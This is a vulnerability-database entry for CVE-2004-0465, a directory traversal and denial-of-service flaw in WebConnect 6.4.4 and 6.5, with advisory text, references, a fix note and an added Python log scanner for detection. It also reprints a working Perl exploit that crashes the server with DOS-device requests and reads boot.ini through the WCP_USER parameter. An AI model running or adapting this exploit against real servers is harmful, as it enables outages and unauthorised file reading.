CVE-2004-0465
CVSS 5.0
Published: 2004-12-31 00:00:00
Last revised: 2016-10-17 22:45:31

[Original] Directory traversal vulnerability in jretest.html in WebConnect 6.5 and 6.4.4, and possibly earlier versions, allows remote attackers to read keys within arbitrary INI formatted files via "..//" sequences in the WCP_USER parameter.


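[CNNVD] OpenConnect WebConnect Multiple Remote Vulnerabilities (CNNVD-200412-1020)

        A directory traversal vulnerability exists in jretest.html in WebConnect 6.5 and 6.4.4, and possibly earlier versions. Remote attackers can read keys within arbitrary INI-formatted files via "..//" sequences in the WCP_USER parameter.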
        

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:openconnect:webconnect:6.5
cpe:/a:openconnect:webconnect:6.4.4

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0465
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0465
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1020
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=110910838600145&w=2
(UNKNOWN)  BUGTRAQ  20050220 The WebConnect 6.4.4 and 6.5 contains several vulnerabilities
http://www.cirt.dk/advisories/cirt-29-advisory.pdf
(VENDOR_ADVISORY)  MISC  http://www.cirt.dk/advisories/cirt-29-advisory.pdf
http://www.kb.cert.org/vuls/id/628411
(VENDOR_ADVISORY)  CERT-VN  VU#628411
http://www.kb.cert.org/vuls/id/JSHA-69HVPK
(VENDOR_ADVISORY)  CONFIRM  http://www.kb.cert.org/vuls/id/JSHA-69HVPK
http://xforce.iss.net/xforce/xfdb/19394
(PATCH)  XF  webconnect-wcpuser-directory-traversal(19394)

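- Vulnerability Information

OpenConnect WebConnect Multiple Remote Vulnerabilities
Medium risk  Path traversal
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        A directory traversal vulnerability exists in jretest.html in WebConnect 6.5 and 6.4.4, and possibly earlier versions. Remote attackers can read keys within arbitrary INI-formatted files via "..//" sequences in the WCP_USER parameter.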
        

- Advisories and Patches

        It is reported that the vendor has addressed these vulnerabilities in version 6.5.1. Customers are advised to contact the vendor for further information regarding obtaining and applying an appropriate update.

- Vulnerability Information (838)

WebConnect 6.4.4 - 6.5 Directory Traversal and Denial of Service Exploit (EDBID:838)
multiple dos
2005-02-24 Verified
0 Karak0rsan
N/A
#WebConnect version 6.4.4 - 6.5 Proof of Concept
#Coded bY ++Karak0rsan++
#karakorsankara@hotmail.com
#Usage:perl webconnect.pl [target] [port] (Default port: 2080)
#Greetz:hurby,phalaposher,r3d_b4r0n,L4M3R,zeronc,Atak,sloan,emre,
#fox and all my friends
#Konak Anatolian High School - Prep/C Class
#You know who you are; I will not forget how you cheated me, and now
#you cannot even look me in the face at school. I WAS FOOLED by your
#innocent face and your eyes! You started everything and you ended it,
#do not forget; WHERE YOU FINISHED ME, YOU ARE FINISHED FOR ME TOO!!!

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
print "WebConnect 6.4.4 - 6.5 Proof of Concept\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl $0 [target] [port]\n";
}


use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...!\n";
print "[+]Allah Allah edalariyla saldiriyoz cunku biz muslumaniz:)\n";
}

use IO::Socket;
for($i= 0; $i < 30; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,Enter target address!\n";
print $socket1 "GET /COM1 HTTP/1.0\r\n";
print $socket1 "GET /COM2 HTTP/1.0\r\n";
print $socket1 "GET /COM1.jsp HTTP/1.0\r\n";
print $socket1 "GET /COM1.html HTTP/1.0\r\n";
print $socket1 "GET /COM1.smurf HTTP/1.0\r\n";
close($socket1);
}
$socket2 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket2 "GET 
/jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= 
HTTP/1.0\r\n";
close($socket2);
print "Attack finished ;)\n";
exit();

# milw0rm.com [2005-02-24]
		

- Vulnerability Information (F36253)

webConnect.txt (PacketStormID:F36253)
2005-02-26 00:00:00
 
advisory,denial of service,vulnerability
CVE-2004-0465

WebConnect versions 6.4.4 and 6.5 contain denial of service and directory traversal vulnerabilities.

WebConnect 6.4.4 and 6.5 contain several vulnerabilities, such as: 
 - Denial of Service when requesting a DOS Device in Path Name 
 - Reading of files outside webroot (Directory traversal)

Requesting "DOS Device in Path Name" Denial of Service
When requesting a DOS device in the URL, the server will stop responding 
to any further requests until a manual restart of the service has been made. 
This attack can be performed on both the client website and the 
administration interface. 

Vulnerable versions: 
 - WebConnect 6.4.4 (Possible previous versions) 
 - WebConnect 6.5 
 
CERT response: 
 - VU#552561 CAN-2004-0466 

 
Reading of files outside webroot (Directory traversal) 
When sending a specially crafted request to the server, it is possible to 
read files outside the webroot. Since the service by default runs with 
system rights, this could give access to the entire partition that
WebConnect is installed on. 

Vulnerable versions:
 - WebConnect 6.4.4 (Possible previous versions) 

CERT response: 
 - VU#628411 CAN-2004-0465
 
Read the full advisory for both the vulnerabilities at:
http://www.cirt.dk/

    

- Vulnerability Information

14010
WebConnect jretest.html Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

WebConnect contains a flaw that allows a remote attacker to read the contents of arbitrary files outside of the web path. The issue is due to jretest.html not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the WCP_USER variable.
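
An added example (not part of the original entry or any vendor code): a log check for the WCP_USER traversal described above, run over constructed access-log lines. It goes beyond the literal "..//" sequence to cover backslash and percent-encoded variants; the common-log-format layout and every name other than jretest.html and WCP_USER are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (documentation IPs, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2005:10:00:01 +0000] "GET /jretest.html?lang=&parms=default&WCP_USER=jdoe&action= HTTP/1.0" 200 512',
    '192.0.2.44 - - [21/Feb/2005:10:00:07 +0000] "GET /jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= HTTP/1.0" 200 733',
    '192.0.2.44 - - [21/Feb/2005:10:00:09 +0000] "GET /jretest.html?lang=&parms=default&WCP_USER=%252e%252e%255capp.ini&action= HTTP/1.0" 200 120',
    '192.0.2.51 - - [21/Feb/2005:10:02:30 +0000] "GET /jretest.html?lang=&parms=default&WCP_USER=conf/app.ini&action= HTTP/1.0" 200 98',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A ".." path segment delimited by start/end of string or a slash/backslash.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
PATH_CHARS_RE = re.compile(r'[\\/:]')

def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def wcp_user_findings(line):
    """Return (kind, decoded_value) pairs for suspicious WCP_USER values."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/jretest.html"):
        return []
    findings = []
    # parse_qs removes one encoding layer; decode_fully removes the rest.
    for raw in parse_qs(url.query, keep_blank_values=True).get("WCP_USER", []):
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(("traversal", value))
        elif PATH_CHARS_RE.search(value):
            findings.append(("path-characters", value))
    return findings

def scan(lines):
    """Return (line_number, kind, value) for every finding in the log."""
    return [(n, kind, value) for n, line in enumerate(lines, 1)
            for kind, value in wcp_user_findings(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
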

- Timeline

2005-02-21 Unknown
2005-02-21 Unknown

- Solution

Upgrade to version 6.5.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

 

 
